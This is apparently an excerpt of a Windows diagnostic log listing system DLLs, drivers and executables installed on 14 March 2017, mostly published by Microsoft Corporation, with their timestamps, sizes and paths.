2017-03-14 15:45 - 2017-03-04 03:01 - 01595904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2017-03-14 15:45 - 2017-03-04 03:01 - 01571840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml3.dll
2017-03-14 15:45 - 2017-03-04 03:01 - 01564160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\quartz.dll
2017-03-14 15:45 - 2017-03-04 03:01 - 01556992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Immersive.dll
2017-03-14 15:45 - 2017-03-04 03:01 - 01293312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMPDMC.exe
2017-03-14 15:45 - 2017-03-04 03:01 - 01232384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Maps.dll
2017-03-14 15:45 - 2017-03-04 03:01 - 01154560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Pimstore.dll
2017-03-14 15:45 - 2017-03-04 03:01 - 01013248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.Http.dll
2017-03-14 15:45 - 2017-03-04 03:01 - 00827904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.appcore.dll
2017-03-14 15:45 - 2017-03-04 03:01 - 00773120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchIndexer.exe
2017-03-14 15:45 - 2017-03-04 03:01 - 00620544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll
2017-03-14 15:45 - 2017-03-04 03:01 - 00566784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ShareHost.dll
2017-03-14 15:45 - 2017-03-04 03:01 - 00560640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserLanguagesCpl.dll
2017-03-14 15:45 - 2017-03-04 03:01 - 00422400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinapi.dll
2017-03-14 15:45 - 2017-03-04 03:00 - 04557824 _____ (Microsoft) C:\WINDOWS\SysWOW64\dbgeng.dll
2017-03-14 15:45 - 2017-03-04 03:00 - 02996736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2017-03-14 15:45 - 2017-03-04 03:00 - 02483200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2017-03-14 15:45 - 2017-03-04 03:00 - 02003968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DWrite.dll
2017-03-14 15:45 - 2017-03-04 03:00 - 01883648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Logon.dll
2017-03-14 15:45 - 2017-03-04 03:00 - 01170944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Phone.dll
2017-03-14 15:45 - 2017-03-04 03:00 - 00862208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll
2017-03-14 15:45 - 2017-03-04 03:00 - 00850944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ContactApis.dll
2017-03-14 15:45 - 2017-03-04 03:00 - 00798208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\authui.dll
2017-03-14 15:45 - 2017-03-04 03:00 - 00751104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.BackgroundTransfer.dll
2017-03-14 15:45 - 2017-03-04 03:00 - 00711680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Search.dll
2017-03-14 15:45 - 2017-03-04 03:00 - 00691200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBroker.dll
2017-03-14 15:45 - 2017-03-04 03:00 - 00654336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MbaeApiPublic.dll
2017-03-14 15:45 - 2017-03-04 03:00 - 00598528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.dll
2017-03-14 15:45 - 2017-03-04 03:00 - 00444416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSync.dll
2017-03-14 15:45 - 2017-03-04 03:00 - 00348160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Midi.dll
2017-03-14 15:45 - 2017-03-04 02:59 - 00353280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TextInputFramework.dll
2017-03-14 15:45 - 2017-03-04 02:59 - 00206848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Core.TextInput.dll
2017-03-14 15:45 - 2017-03-04 02:57 - 03106304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstsc.exe
2017-03-14 15:45 - 2017-03-04 02:57 - 00783360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TSWorkspace.dll
2017-03-14 15:45 - 2017-03-04 02:57 - 00449024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TpmCoreProvisioning.dll
2017-03-14 15:45 - 2017-03-04 02:57 - 00299008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\RADCUI.dll
2017-03-14 15:45 - 2017-03-04 02:36 - 00483840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll
2017-03-14 15:44 - 2017-03-04 04:26 - 00794416 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Shell.Broker.dll
2017-03-14 15:44 - 2017-03-04 04:24 - 02482280 _____ (Microsoft Corporation) C:\WINDOWS\system32\msmpeg2vdec.dll
2017-03-14 15:44 - 2017-03-04 04:24 - 02186896 _____ (Microsoft Corporation) C:\WINDOWS\system32\hevcdecoder.dll
2017-03-14 15:44 - 2017-03-04 04:24 - 00108384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pdc.sys
2017-03-14 15:44 - 2017-03-04 04:23 - 02512304 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMVDECOD.DLL
2017-03-14 15:44 - 2017-03-04 04:22 - 02213760 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2017-03-14 15:44 - 2017-03-04 04:18 - 01181024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys
2017-03-14 15:44 - 2017-03-04 04:18 - 00118624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tdx.sys
2017-03-14 15:44 - 2017-03-04 04:17 - 00409952 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\FWPKCLNT.SYS
2017-03-14 15:44 - 2017-03-04 04:15 - 01000280 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2017-03-14 15:44 - 2017-03-04 04:10 - 00360040 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsAdminFlows.exe
2017-03-14 15:44 - 2017-03-04 04:09 - 07220696 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2017-03-14 15:44 - 2017-03-04 04:09 - 01860288 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.dll
2017-03-14 15:44 - 2017-03-04 04:09 - 01293152 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManager.dll
2017-03-14 15:44 - 2017-03-04 04:09 - 00527808 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWanAPI.dll
2017-03-14 15:44 - 2017-03-04 04:09 - 00396168 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanapi.dll
2017-03-14 15:44 - 2017-03-04 04:06 - 01706488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2017-03-14 15:44 - 2017-03-04 04:04 - 08169536 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2017-03-14 15:44 - 2017-03-04 04:04 - 01063472 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfds.dll
2017-03-14 15:44 - 2017-03-04 04:03 - 22223968 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2017-03-14 15:44 - 2017-03-04 04:03 - 04260576 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
2017-03-14 15:44 - 2017-03-04 04:03 - 01989072 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll
2017-03-14 15:44 - 2017-03-04 04:03 - 01848072 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsrcsnk.dll
2017-03-14 15:44 - 2017-03-04 04:03 - 01723560 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcMon.exe
2017-03-14 15:44 - 2017-03-04 04:03 - 01702392 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfasfsrcsnk.dll
2017-03-14 15:44 - 2017-03-04 04:03 - 01473048 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfplat.dll
2017-03-14 15:44 - 2017-03-04 04:03 - 01454512 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfnetsrc.dll
2017-03-14 15:44 - 2017-03-04 04:03 - 01301112 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmpeg2srcsnk.dll
2017-03-14 15:44 - 2017-03-04 04:03 - 01071736 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfnetcore.dll
2017-03-14 15:44 - 2017-03-04 04:03 - 01062480 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll
2017-03-14 15:44 - 2017-03-04 04:03 - 00811416 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFCaptureEngine.dll
2017-03-14 15:44 - 2017-03-04 04:03 - 00596040 _____ (Microsoft Corporation) C:\WINDOWS\system32\mf.dll
2017-03-14 15:44 - 2017-03-04 04:03 - 00443232 _____ (Microsoft Corporation) C:\WINDOWS\system32\MMDevAPI.dll
2017-03-14 15:44 - 2017-03-04 04:03 - 00382272 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockAppHost.exe
2017-03-14 15:44 - 2017-03-04 04:01 - 00137936 _____ (Microsoft Corporation) C:\WINDOWS\system32\AuthHost.exe
2017-03-14 15:44 - 2017-03-04 03:57 - 02536288 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2017-03-14 15:44 - 2017-03-04 03:57 - 00387872 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpps.dll
2017-03-14 15:44 - 2017-03-04 03:39 - 00372736 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXTaskFactory.dll
2017-03-14 15:44 - 2017-03-04 03:36 - 22565376 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2017-03-14 15:44 - 2017-03-04 03:36 - 00126976 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssitlb.dll
2017-03-14 15:44 - 2017-03-04 03:36 - 00119296 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTimeUtil.dll
2017-03-14 15:44 - 2017-03-04 03:36 - 00101888 _____ (Microsoft Corporation) C:\WINDOWS\system32\DuCsps.dll
2017-03-14 15:44 - 2017-03-04 03:36 - 00073728 _____ (Microsoft Corporation) C:\WINDOWS\system32\usoapi.dll
2017-03-14 15:44 - 2017-03-04 03:35 - 00053248 _____ (Microsoft Corporation) C:\WINDOWS\system32\musdialoghandlers.dll
2017-03-14 15:44 - 2017-03-04 03:35 - 00030208 _____ (Microsoft Corporation) C:\WINDOWS\system32\odbcconf.dll
2017-03-14 15:44 - 2017-03-04 03:34 - 00237568 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.Diagnostics.dll
2017-03-14 15:44 - 2017-03-04 03:34 - 00226304 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2017-03-14 15:44 - 2017-03-04 03:34 - 00123904 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssprxy.dll
2017-03-14 15:44 - 2017-03-04 03:34 - 00085504 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotificationUx.exe
2017-03-14 15:44 - 2017-03-04 03:34 - 00047104 _____ (Microsoft Corporation) C:\WINDOWS\system32\wfdprov.dll
2017-03-14 15:44 - 2017-03-04 03:33 - 00295424 _____ (Microsoft Corporation) C:\WINDOWS\system32\unimdm.tsp
2017-03-14 15:44 - 2017-03-04 03:33 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.UI.GameBar.dll
2017-03-14 15:44 - 2017-03-04 03:33 - 00030208 _____ (Microsoft Corporation) C:\WINDOWS\system32\netiougc.exe
2017-03-14 15:44 - 2017-03-04 03:32 - 00263680 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExSMime.dll
2017-03-14 15:44 - 2017-03-04 03:32 - 00193536 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinRtTracing.dll
2017-03-14 15:44 - 2017-03-04 03:32 - 00179712 _____ (Microsoft Corporation) C:\WINDOWS\system32\MCCSEngineShared.dll
2017-03-14 15:44 - 2017-03-04 03:32 - 00113664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.ServiceDiscovery.Dnssd.dll
2017-03-14 15:44 - 2017-03-04 03:31 - 00467968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.XboxLive.Storage.dll
2017-03-14 15:44 - 2017-03-04 03:31 - 00322048 _____ (Microsoft Corporation) C:\WINDOWS\system32\accountaccessor.dll
2017-03-14 15:44 - 2017-03-04 03:31 - 00187904 _____ (Microsoft Corporation) C:\WINDOWS\system32\VCardParser.dll
2017-03-14 15:44 - 2017-03-04 03:31 - 00149504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Core.dll
2017-03-14 15:44 - 2017-03-04 03:30 - 00535552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\nwifi.sys
2017-03-14 15:44 - 2017-03-04 03:30 - 00418304 _____ C:\WINDOWS\system32\Windows.Perception.Stub.dll
2017-03-14 15:44 - 2017-03-04 03:30 - 00206336 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchFilterHost.exe
2017-03-14 15:44 - 2017-03-04 03:30 - 00127488 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Credentials.UI.UserConsentVerifier.dll
2017-03-14 15:44 - 2017-03-04 03:30 - 00120320 _____ (Microsoft Corporation) C:\WINDOWS\system32\DafPrintProvider.dll
2017-03-14 15:44 - 2017-03-04 03:30 - 00052224 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpipreg.sys
2017-03-14 15:44 - 2017-03-04 03:29 - 01291264 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVPXENC.dll
2017-03-14 15:44 - 2017-03-04 03:29 - 00730112 _____ (Microsoft Corporation) C:\WINDOWS\system32\nshwfp.dll
2017-03-14 15:44 - 2017-03-04 03:29 - 00249856 _____ (Microsoft Corporation) C:\WINDOWS\system32\cemapi.dll
2017-03-14 15:44 - 2017-03-04 03:29 - 00235008 _____ (Microsoft Corporation) C:\WINDOWS\system32\tapi32.dll
2017-03-14 15:44 - 2017-03-04 03:29 - 00203264 _____ (Microsoft Corporation) C:\WINDOWS\system32\PimIndexMaintenance.dll
2017-03-14 15:44 - 2017-03-04 03:29 - 00126464 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblGameSaveExt.dll
2017-03-14 15:44 - 2017-03-04 03:29 - 00082944 _____ (Microsoft Corporation) C:\WINDOWS\system32\moshost.dll
2017-03-14 15:44 - 2017-03-04 03:28 - 01507840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.FaceAnalysis.dll
2017-03-14 15:44 - 2017-03-04 03:28 - 00741888 _____ (Microsoft Corporation) C:\WINDOWS\system32\internetmail.dll
2017-03-14 15:44 - 2017-03-04 03:28 - 00556544 _____ (Microsoft Corporation) C:\WINDOWS\system32\iprtrmgr.dll
2017-03-14 15:44 - 2017-03-04 03:28 - 00462848 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansec.dll
2017-03-14 15:44 - 2017-03-04 03:28 - 00390144 _____ (Microsoft Corporation) C:\WINDOWS\system32\Search.ProtocolHandler.MAPI2.dll
2017-03-14 15:44 - 2017-03-04 03:28 - 00216576 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Scanners.dll
2017-03-14 15:44 - 2017-03-04 03:27 - 06574592 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwanmm.dll
2017-03-14 15:44 - 2017-03-04 03:27 - 00778752 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssvp.dll
2017-03-14 15:44 - 2017-03-04 03:27 - 00719872 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdiWiFi.sys
2017-03-14 15:44 - 2017-03-04 03:27 - 00590336 _____ (Microsoft Corporation) C:\WINDOWS\system32\efswrt.dll
2017-03-14 15:44 - 2017-03-04 03:27 - 00549376 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll
2017-03-14 15:44 - 2017-03-04 03:27 - 00456192 _____ (Microsoft Corporation) C:\WINDOWS\system32\puiobj.dll
2017-03-14 15:44 - 2017-03-04 03:27 - 00446976 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapConfiguration.dll
2017-03-14 15:44 - 2017-03-04 03:27 - 00358912 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.dll
2017-03-14 15:44 - 2017-03-04 03:27 - 00349184 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchProtocolHost.exe
2017-03-14 15:44 - 2017-03-04 03:27 - 00292864 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll
2017-03-14 15:44 - 2017-03-04 03:27 - 00252416 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.Identity.Provider.dll
2017-03-14 15:44 - 2017-03-04 03:27 - 00200192 _____ (Microsoft Corporation) C:\WINDOWS\system32\puiapi.dll
2017-03-14 15:44 - 2017-03-04 03:26 - 00631296 _____ (Microsoft Corporation) C:\WINDOWS\system32\WlanMediaManager.dll
2017-03-14 15:44 - 2017-03-04 03:26 - 00561664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Wallet.dll
2017-03-14 15:44 - 2017-03-04 03:26 - 00468992 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwanconn.dll
2017-03-14 15:44 - 2017-03-04 03:26 - 00409600 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanui.dll
2017-03-14 15:44 - 2017-03-04 03:26 - 00383488 _____ (Microsoft Corporation) C:\WINDOWS\system32\DavSyncProvider.dll
2017-03-14 15:44 - 2017-03-04 03:26 - 00366080 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchFolder.dll
2017-03-14 15:44 - 2017-03-04 03:26 - 00307200 _____ (Microsoft Corporation) C:\WINDOWS\system32\PrintDialogs3D.dll
2017-03-14 15:44 - 2017-03-04 03:25 - 01388544 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Cred.dll
2017-03-14 15:44 - 2017-03-04 03:25 - 00748544 _____ (Microsoft Corporation) C:\WINDOWS\system32\ChatApis.dll
2017-03-14 15:44 - 2017-03-04 03:25 - 00579584 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.UX.EapRequestHandler.dll
2017-03-14 15:44 - 2017-03-04 03:25 - 00548864 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
2017-03-14 15:44 - 2017-03-04 03:25 - 00320000 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.TestingFramework.dll
2017-03-14 15:44 - 2017-03-04 03:25 - 00284160 _____ (Microsoft Corporation) C:\WINDOWS\system32\AboveLockAppHost.dll
2017-03-14 15:44 - 2017-03-04 03:25 - 00245760 _____ (Microsoft Corporation) C:\WINDOWS\system32\WwaApi.dll
2017-03-14 15:44 - 2017-03-04 03:25 - 00168448 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssph.dll
2017-03-14 15:44 - 2017-03-04 03:25 - 00057344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WPDShServiceObj.dll
2017-03-14 15:44 - 2017-03-04 03:24 - 01293312 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcnwiz.dll
2017-03-14 15:44 - 2017-03-04 03:24 - 00671744 _____ (Microsoft Corporation) C:\WINDOWS\system32\mbsmsapi.dll
2017-03-14 15:44 - 2017-03-04 03:23 - 01184256 _____ (Microsoft Corporation) C:\WINDOWS\system32\Unistore.dll
2017-03-14 15:44 - 2017-03-04 03:23 - 01145856 _____ (Microsoft Corporation) C:\WINDOWS\system32\EmailApis.dll
2017-03-14 15:44 - 2017-03-04 03:23 - 00963584 _____ (Microsoft Corporation) C:\WINDOWS\system32\WebcamUi.dll
2017-03-14 15:44 - 2017-03-04 03:23 - 00945152 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasgcw.dll
2017-03-14 15:44 - 2017-03-04 03:23 - 00820224 _____ (Microsoft Corporation) C:\WINDOWS\system32\PrintRenderAPIHost.DLL
2017-03-14 15:44 - 2017-03-04 03:23 - 00583680 _____ (Microsoft Corporation) C:\WINDOWS\system32\PrintDialogs.dll
2017-03-14 15:44 - 2017-03-04 03:23 - 00526336 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2017-03-14 15:44 - 2017-03-04 03:23 - 00330752 _____ (Microsoft Corporation) C:\WINDOWS\system32\NgcCtnrSvc.dll
2017-03-14 15:44 - 2017-03-04 03:22 - 00254464 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssphtb.dll
2017-03-14 15:44 - 2017-03-04 03:21 - 06285824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2017-03-14 15:44 - 2017-03-04 03:21 - 01937920 _____ (Microsoft Corporation) C:\WINDOWS\system32\mmc.exe
2017-03-14 15:44 - 2017-03-04 03:21 - 00809984 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Storage.Search.dll
2017-03-14 15:44 - 2017-03-04 03:20 - 00611328 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Graphics.Printing.dll
2017-03-14 15:44 - 2017-03-04 03:19 - 23676416 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2017-03-14 15:44 - 2017-03-04 03:19 - 03777536 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2017-03-14 15:44 - 2017-03-04 03:19 - 01403392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Editing.dll
2017-03-14 15:44 - 2017-03-04 03:19 - 00458752 _____ (Microsoft Corporation) C:\WINDOWS\system32\RTMediaFrame.dll
2017-03-14 15:44 - 2017-03-04 03:19 - 00410112 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv.sys
2017-03-14 15:44 - 2017-03-04 03:18 - 17198592 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2017-03-14 15:44 - 2017-03-04 03:18 - 01762816 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSPhotography.dll
2017-03-14 15:44 - 2017-03-04 03:18 - 01189376 _____ (Microsoft Corporation) C:\WINDOWS\system32\sdengin2.dll
2017-03-14 15:44 - 2017-03-04 03:18 - 00156672 _____ (Microsoft Corporation) C:\WINDOWS\system32\RelPost.exe
2017-03-14 15:44 - 2017-03-04 03:17 - 07812096 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingMaps.dll
2017-03-14 15:44 - 2017-03-04 03:17 - 00864256 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnapps.dll
2017-03-14 15:44 - 2017-03-04 03:16 - 13441536 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmp.dll
2017-03-14 15:44 - 2017-03-04 03:16 - 01908224 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
2017-03-14 15:44 - 2017-03-04 03:16 - 00870400 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmkvsrcsnk.dll
2017-03-14 15:44 - 2017-03-04 03:16 - 00846336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WebcamUi.dll
2017-03-14 15:44 - 2017-03-04 03:16 - 00626688 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpaceControl.dll
2017-03-14 15:44 - 2017-03-04 03:16 - 00100864 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpninprc.dll
2017-03-14 15:44 - 2017-03-04 03:15 - 01078784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Streaming.dll
2017-03-14 15:44 - 2017-03-04 03:13 - 01366016 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpncore.dll
2017-03-14 15:44 - 2017-03-04 03:13 - 01217024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Audio.dll
2017-03-14 15:44 - 2017-03-04 03:13 - 00858112 _____ (Microsoft Corporation) C:\WINDOWS\system32\mprddm.dll
2017-03-14 15:44 - 2017-03-04 03:13 - 00125952 _____ (Microsoft Corporation) C:\WINDOWS\system32\sdshext.dll
2017-03-14 15:44 - 2017-03-04 03:12 - 13085184 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2017-03-14 15:44 - 2017-03-04 03:12 - 07654912 _____ (Microsoft Corporation) C:\WINDOWS\system32\mos.dll
2017-03-14 15:44 - 2017-03-04 03:12 - 04596224 _____ (Microsoft Corporation) C:\WINDOWS\system32\xpsrchvw.exe
2017-03-14 15:44 - 2017-03-04 03:12 - 00947712 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVP9DEC.dll
2017-03-14 15:44 - 2017-03-04 03:12 - 00805888 _____ (Microsoft Corporation) C:\WINDOWS\system32\FrameServer.dll
2017-03-14 15:44 - 2017-03-04 03:11 - 03441664 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapRouter.dll
2017-03-14 15:44 - 2017-03-04 03:11 - 02953216 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapGeocoder.dll
2017-03-14 15:44 - 2017-03-04 03:11 - 01891328 _____ (Microsoft Corporation) C:\WINDOWS\system32\pnidui.dll
2017-03-14 15:44 - 2017-03-04 03:10 - 02852864 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsThresholdAdminFlowUI.dll
2017-03-14 15:44 - 2017-03-04 03:10 - 01917440 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActiveSyncProvider.dll
2017-03-14 15:44 - 2017-03-04 03:10 - 01555456 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMPDMC.exe
2017-03-14 15:44 - 2017-03-04 03:10 - 01536000 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpeechPal.dll
2017-03-14 15:44 - 2017-03-04 03:10 - 01399296 _____ (Microsoft Corporation) C:\WINDOWS\system32\Pimstore.dll
2017-03-14 15:44 - 2017-03-04 03:10 - 01282048 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwansvc.dll
2017-03-14 15:44 - 2017-03-04 03:10 - 01033216 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsStore.dll
2017-03-14 15:44 - 2017-03-04 03:10 - 00816640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll
2017-03-14 15:44 - 2017-03-04 03:10 - 00579072 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockAppBroker.dll
2017-03-14 15:44 - 2017-03-04 03:09 - 01359360 _____ (Microsoft Corporation) C:\WINDOWS\system32\usercpl.dll
2017-03-14 15:44 - 2017-03-04 03:09 - 00846336 _____ (Microsoft Corporation) C:\WINDOWS\system32\MbaeApiPublic.dll
2017-03-14 15:44 - 2017-03-04 03:09 - 00771072 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppointmentApis.dll
2017-03-14 15:44 - 2017-03-04 03:09 - 00765440 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Sensors.dll
2017-03-14 15:44 - 2017-03-04 03:08 - 12349952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmp.dll
2017-03-14 15:44 - 2017-03-04 03:08 - 08076288 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll
2017-03-14 15:44 - 2017-03-04 03:08 - 02800128 _____ (Microsoft Corporation) C:\WINDOWS\system32\netshell.dll
2017-03-14 15:44 - 2017-03-04 03:08 - 02424320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Perception.dll
2017-03-14 15:44 - 2017-03-04 03:08 - 01981440 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2017-03-14 15:44 - 2017-03-04 03:08 - 01266176 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Input.Inking.dll
2017-03-14 15:44 - 2017-03-04 03:08 - 00834048 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32spl.dll
2017-03-14 15:44 - 2017-03-04 03:08 - 00792576 _____ (Microsoft Corporation) C:\WINDOWS\system32\spoolsv.exe
2017-03-14 15:44 - 2017-03-04 03:07 - 12178944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2017-03-14 15:44 - 2017-03-04 03:07 - 02370048 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansvc.dll
2017-03-14 15:44 - 2017-03-04 03:07 - 01792512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Wpc.dll
2017-03-14 15:44 - 2017-03-04 03:07 - 01512448 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataService.dll
2017-03-14 15:44 - 2017-03-04 03:07 - 00903680 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchIndexer.exe
